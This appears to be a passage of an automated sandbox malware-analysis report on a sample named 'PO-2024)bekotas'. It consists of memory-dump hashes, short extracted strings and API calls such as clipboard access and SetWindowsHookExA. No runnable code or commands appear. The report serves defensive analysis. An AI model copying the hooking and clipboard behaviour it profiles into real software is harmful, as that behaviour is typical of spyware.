                                        • Opcode ID: 68e826a862699699d758a6875c41a850b819e0fee39c6f63b3e22a2ac22ef8f7
                                        • Instruction ID: 1a909267882db02bcba0462e49e3e5a26b3d47a880eb5c57e69325b4296be32c
                                        • Opcode Fuzzy Hash: 68e826a862699699d758a6875c41a850b819e0fee39c6f63b3e22a2ac22ef8f7
                                        • Instruction Fuzzy Hash: A3F02231714A1A97C318CE6EA98051BF6AFBBC4B10314C13BA20DC3A62CF70ED1187D1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66829ae754c098ce1f3b4c3083a498c7730235badd2073af61a03ee3fbf1acd7
                                        • Instruction ID: 3153cb3594629dd889d3e95a12033424f3064df61c34520749152f6c50558d04
                                        • Opcode Fuzzy Hash: 66829ae754c098ce1f3b4c3083a498c7730235badd2073af61a03ee3fbf1acd7
                                        • Instruction Fuzzy Hash: 82016D30314200DFC718EB69E450E2AB3EAFF85320B54C479D60A8776ADBB1EC02CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30581b8f8b8545e77cef9386408435c52c3ca241b1d8ee84c1cc2f908d51a969
                                        • Instruction ID: 458e5e1a38734eb302ae48d56f52c812d238fd3bd9819f58d74e146a538dc8a9
                                        • Opcode Fuzzy Hash: 30581b8f8b8545e77cef9386408435c52c3ca241b1d8ee84c1cc2f908d51a969
                                        • Instruction Fuzzy Hash: 8CF09671F001155B8F06B7B8B8554FFBABAAB98610B040029DA05A7741CA310E0287E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e649633ca39585fb4b1c510976451ee0ca98a76347f336d641e1e4ba6af97eb
                                        • Instruction ID: 36892660c1122340ceddb0d7ef5f7095eb2989e4b449d277dc3f0cd52b279a69
                                        • Opcode Fuzzy Hash: 1e649633ca39585fb4b1c510976451ee0ca98a76347f336d641e1e4ba6af97eb
                                        • Instruction Fuzzy Hash: 27F020B27041247F9B04CAA8AC18BFF7FFCE786664B040069A909C3600EA628C0283A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013847408.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f0d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: efce43e6ef040be3b6fd7b5f8f98b47e0f2201c1927d7c3f5146c473328b085c
                                        • Instruction ID: 565ac74b6909918f8c1aece25ccec9766880b26bc3b42e0cece2a46279ed6060
                                        • Opcode Fuzzy Hash: efce43e6ef040be3b6fd7b5f8f98b47e0f2201c1927d7c3f5146c473328b085c
                                        • Instruction Fuzzy Hash: DFF0C271805344DEE7208A06CC84BA2FFA8EF91734F18C45AED080A286C3799840EAB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c291dc6bd062aa4c1778503055616a2a1b95c8b320f083a0ebfbecd26bc1bf78
                                        • Instruction ID: b433cfb106a276013910ec19bc5c7cd1666a90fb1cc8c94642af914ab4ae2814
                                        • Opcode Fuzzy Hash: c291dc6bd062aa4c1778503055616a2a1b95c8b320f083a0ebfbecd26bc1bf78
                                        • Instruction Fuzzy Hash: C3F0E27060D348AEEB51A664A40672EBBE4AB41708F58C0AEE50C8A943C167CC4B9756
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7f071e6c061e9bb7dea0309b13acb614c2ea5c028ef1f95044245b58075b73c
                                        • Instruction ID: c10c21c826fa504c0ea9536402fb2debb0effe34048d1f98073b1ae5f016c6e6
                                        • Opcode Fuzzy Hash: a7f071e6c061e9bb7dea0309b13acb614c2ea5c028ef1f95044245b58075b73c
                                        • Instruction Fuzzy Hash: A6F0F935A001188FCB54EB58E5849DCB3F5FF8C725B154099D905B7365CB35AD45CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4839d272cc7ef09d80bf35f24ab5b1ad592498ee49974749a89debf2df5d656
                                        • Instruction ID: 3a4bc0295c7ae479743d128b2197bc6ec61bb784bf35458415d7e636b7086f84
                                        • Opcode Fuzzy Hash: d4839d272cc7ef09d80bf35f24ab5b1ad592498ee49974749a89debf2df5d656
                                        • Instruction Fuzzy Hash: 7EF0A03250C204AADF91CB95F8407EFBFE9AB86214F8941BADE08C2A41E6309440C761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce19b77aef30a109c253f62705ea524319018c0ed608a967eef7cb241c2ae36b
                                        • Instruction ID: 6bd56930753e6bf45535ef6fab46c76cc538906266154d2c3b70fddcd6e15103
                                        • Opcode Fuzzy Hash: ce19b77aef30a109c253f62705ea524319018c0ed608a967eef7cb241c2ae36b
                                        • Instruction Fuzzy Hash: 02F0A735A00219AFCF109A6DD8097DEBBF5FB84315F008425E985D3344D734690ACFC5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 116cf81bf87e497b8eecacd91b299db3e473d0e40a3a6c00edf5b01e5be2ffcb
                                        • Instruction ID: df318365b82fec8fc11b66911bdc5efb9bf5c7df4a9b1ad36175f405221bbed1
                                        • Opcode Fuzzy Hash: 116cf81bf87e497b8eecacd91b299db3e473d0e40a3a6c00edf5b01e5be2ffcb
                                        • Instruction Fuzzy Hash: D8F05E36A0424CAB9F619E64EC048DE3BA0EF09226B058562FBA4D6551D378DA24DB92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q$PH]q
                                        • API String ID: 0-1166926398
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94797475a0f395813b8926bf1de1e1e6fa7b9c7a9eee34cf323dce85a7a8c4dd
                                        • Instruction ID: 7bf7b0df4e7cd2eba61f286a76ea4d3ea5a66cc1f9a2c2dda342f239eea22126
                                        • Opcode Fuzzy Hash: 94797475a0f395813b8926bf1de1e1e6fa7b9c7a9eee34cf323dce85a7a8c4dd
                                        • Instruction Fuzzy Hash: 93E11874E001598FDB14DFA9C9809AEFBB2FF89305F248169E914AB356D731AD42CF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a37fdcdec3257883e94849015186d2e28db85b3a17e030749de2cb9397988c0
                                        • Instruction ID: eacb5df54a2859e13c53eae3c6dccf96d887706f52267ab232eaca4c92b93cff
                                        • Opcode Fuzzy Hash: 8a37fdcdec3257883e94849015186d2e28db85b3a17e030749de2cb9397988c0
                                        • Instruction Fuzzy Hash: F8E1FA74E00159CFCB14DFA9C9909AEBBB2FF89305F248159E514AB35AD731AD42CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c129434e87234a47d8946087d6403d88e30b38dbf26c0b1084cc4d3cf3e4a56d
                                        • Instruction ID: 55cdc977dd8c61eb9f660ecb3142fb4ddf21f2652cd822ebb3000d2947d1248e
                                        • Opcode Fuzzy Hash: c129434e87234a47d8946087d6403d88e30b38dbf26c0b1084cc4d3cf3e4a56d
                                        • Instruction Fuzzy Hash: 4BA17236E0021ACFCF09DFB8C8845DEBBB2FF85304B15856AE905AB265DB31D956CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9db6fc0bcb2ba2bb354f61c278cba7eb0a54bacf66278f77ed4e014c077c0322
                                        • Instruction ID: 17db6d21a078d860e49032184cf3d32ebc54f419e008cfc4cc1fdff1434d6929
                                        • Opcode Fuzzy Hash: 9db6fc0bcb2ba2bb354f61c278cba7eb0a54bacf66278f77ed4e014c077c0322
                                        • Instruction Fuzzy Hash: 8AC106F0C807468BD711CF65EC481897BB1BB85318F964A09DE616B2E1EFB8946BCF44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                        • API String ID: 0-471056614
                                        • Opcode ID: 6d2aa9fff46792cea49e9a278263362f973768fe3bdb3de2477cc6189adec1f8
                                        • Instruction ID: 9e868339eeaf55d28244e2418e616e90c19d8ef6a87b34e6ad7585c84e0b04dc
                                        • Opcode Fuzzy Hash: 6d2aa9fff46792cea49e9a278263362f973768fe3bdb3de2477cc6189adec1f8
                                        • Instruction Fuzzy Hash: 7A413270E412098FCB0CEF64EC9159E7BB6FF44304BC1486AD4459B2A5EF34AD26DB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                        • API String ID: 0-471056614
                                        • Opcode ID: 7466f20c1cc5bfed56ea0d083ea036ef65ac280250c3eb5d05773d0367b78fa1
                                        • Instruction ID: c1f6d0b5e6789c1cec212a13477b12bebb3bfa029347ca69b0122829ccff8608
                                        • Opcode Fuzzy Hash: 7466f20c1cc5bfed56ea0d083ea036ef65ac280250c3eb5d05773d0367b78fa1
                                        • Instruction Fuzzy Hash: 12412230E412068FCB0CEF64EC5155E7BB6FF44304BC1496AD4459B2A5EF34AD26DB91

                                        Execution Graph

                                        Execution Coverage:11.1%
                                        Dynamic/Decrypted Code Coverage:92.1%
                                        Signature Coverage:0%
                                        Total number of Nodes:178
                                        Total number of Limit Nodes:17

                                        Control-flow Graph

                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050E8AAA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Control-flow Graph

                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050E8AAA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Control-flow Graph

                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 050ED649
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph

                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050EC77F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        Control-flow Graph

                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050EC77F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        Control-flow Graph

                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00FE72C8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4456177209.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_fe0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0

                                        Control-flow Graph

                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 050EFEA3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 050EFEA3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00FE72C8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4456177209.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_fe0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 58d1c5fab2aab5eb04c976aae911cc6c9b2d2c72be3626f8555b1f8dc920986d
                                        • Instruction ID: 19fa9fb409b8d00a59d6a72cd6e1658331902ff53106350832b81dd93696a6bf
                                        • Opcode Fuzzy Hash: 58d1c5fab2aab5eb04c976aae911cc6c9b2d2c72be3626f8555b1f8dc920986d
                                        • Instruction Fuzzy Hash: C31130B1C0465A9BCB10DF9AC544AAEFBB4EF48320F10812AE918A7240D738A940CFA1
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 050E7956
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 077653881e53f4288e38976165c30871c027c697630fd5591ffc9d2f180d0807
                                        • Instruction ID: 2767aefa6c6d8602fda78629fc10b5ad95530b7774637b21dc0099c337cec4d8
                                        • Opcode Fuzzy Hash: 077653881e53f4288e38976165c30871c027c697630fd5591ffc9d2f180d0807
                                        • Instruction Fuzzy Hash: F811FDB58046898FCB10DF9AE444A9EFBF4EF89210F20842AD869B7210D379A545CFA1
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 050E7956
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a7899586ea6e0517635ab8cbefab7ca644595f4dcd14cbb899ded785ee053fc0
                                        • Instruction ID: db1a047ac8619281dee90cfcea9d618a1e635a0f0166ed0344e7c49da2c6f0aa
                                        • Opcode Fuzzy Hash: a7899586ea6e0517635ab8cbefab7ca644595f4dcd14cbb899ded785ee053fc0
                                        • Instruction Fuzzy Hash: 07110FB6C002498FCB10DF9AD844A9EFBF4EF89210F20841AD469B7310C379A545CFA1
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 050EE1E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: ab25e82fa25be3f600da94766d2a900467c4878915039d6391440d34f0331447
                                        • Instruction ID: b67365c903dc25bd542cef0408e069d6ebddf70527fdd7ba82d52fd64ab48585
                                        • Opcode Fuzzy Hash: ab25e82fa25be3f600da94766d2a900467c4878915039d6391440d34f0331447
                                        • Instruction Fuzzy Hash: EF1136B58043498FCB10DFAAD444BDEFFF8AB48310F248459E559A7610D378A584CFA1
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,050ED89D), ref: 050ED927
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 1a2285a7a5b28268614812affb944a521a26c2825b672b901dabc508b1c1ad9e
                                        • Instruction ID: a07c5b18bd6293dcd24afdeab0cbf5d24893d44615a4384ddf5846d3eb6c573a
                                        • Opcode Fuzzy Hash: 1a2285a7a5b28268614812affb944a521a26c2825b672b901dabc508b1c1ad9e
                                        • Instruction Fuzzy Hash: 3E1115B5804648DFCB10DF9AE944BDEFBF4FB49310F20845AD519A7250C378A944CFA5
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,050ED89D), ref: 050ED927
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 92510eb8e4e957c13398a4a181a6ed1a2cbfe8983fe8031e382081192dc96c34
                                        • Instruction ID: f7ff87cff1d4f2d360b415745e305e3fbee8c45ba769a768a8a98e8ced73f4c6
                                        • Opcode Fuzzy Hash: 92510eb8e4e957c13398a4a181a6ed1a2cbfe8983fe8031e382081192dc96c34
                                        • Instruction Fuzzy Hash: 161133B58042489FCB10DFAAD884BDEFFF8EF48310F20841AD559A3210C378A540CFA1
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 050EE1E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 8c2ab771b86d0b3db9b3123d7a5dd02e9c60e32028c0b81d347b8b05774d30d0
                                        • Instruction ID: 082232a665568adee4e05cf2c093a83b76a2fd024c3e8994f05133ffc6147795
                                        • Opcode Fuzzy Hash: 8c2ab771b86d0b3db9b3123d7a5dd02e9c60e32028c0b81d347b8b05774d30d0
                                        • Instruction Fuzzy Hash: C71145B59043488FCB10DF9AD844BDEBBF8EB48310F248459E559A7310C339A584CFA5
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 050EE1E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 6d86ec4bad0151a0a4077924d0f7d5c6c12493a218a9ab486df23a68eeced445
                                        • Instruction ID: d92e4a7516280a93a84f5b43c429387fd9be773013f759d40543ec5fff87d33f
                                        • Opcode Fuzzy Hash: 6d86ec4bad0151a0a4077924d0f7d5c6c12493a218a9ab486df23a68eeced445
                                        • Instruction Fuzzy Hash: 6C1145B48043488FCB20DF9AD844BDEBBF8EB48310F248459E519A7210D378A980CFA4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b6f0aab4f843787040bd9d1b7b2d9542d23c3a59b4796ad2bea6887b1857fab
                                        • Instruction ID: fb89a2af4ba5707c1e2a3635899095795fd26cea369fc30642d12a9091d672f0
                                        • Opcode Fuzzy Hash: 1b6f0aab4f843787040bd9d1b7b2d9542d23c3a59b4796ad2bea6887b1857fab
                                        • Instruction Fuzzy Hash: 7221F271608204DFCB15DF24E984B26BF66FB88318F20C56DD90A5B396C33AD807CA61
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 021f1bc4eee7a2387d45de10861ba0cbfc8513c0fde6de12000250f8adb4f8bc
                                        • Instruction ID: 550900f86e291c0e119d600fc7b154e55d9c93c848cf74ba89c79925ba04894a
                                        • Opcode Fuzzy Hash: 021f1bc4eee7a2387d45de10861ba0cbfc8513c0fde6de12000250f8adb4f8bc
                                        • Instruction Fuzzy Hash: A821C271609244EFDB04DF24E9C4B26BF65FB98318F20C5ADED095B356C33AD846C661
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67651fe8b71d5d4b11ed0016d453de5099bac086a85491d3873fde876265469c
                                        • Instruction ID: 4435314ffd77fc48382be9b6089a19eafba8eaff681590356658032cba4c7ead
                                        • Opcode Fuzzy Hash: 67651fe8b71d5d4b11ed0016d453de5099bac086a85491d3873fde876265469c
                                        • Instruction Fuzzy Hash: 0021807550D3808FCB02CF24D994715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                        • Instruction ID: 01ecac0a27b6379f5b88b46431f41f8fc408592d8668860fceb37633ac873c17
                                        • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                        • Instruction Fuzzy Hash: DA11BB75508280CFDB06CF10D9C4B15BFA1FB94318F24C6A9DC494B756C33AD84ACB52

                                        Execution Graph

                                        Execution Coverage:10.9%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:203
                                        Total number of Limit Nodes:11

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !Y3E$Te]q$Te]q$$]q$$]q$$]q$$]q
                                        • API String ID: 0-1582036792
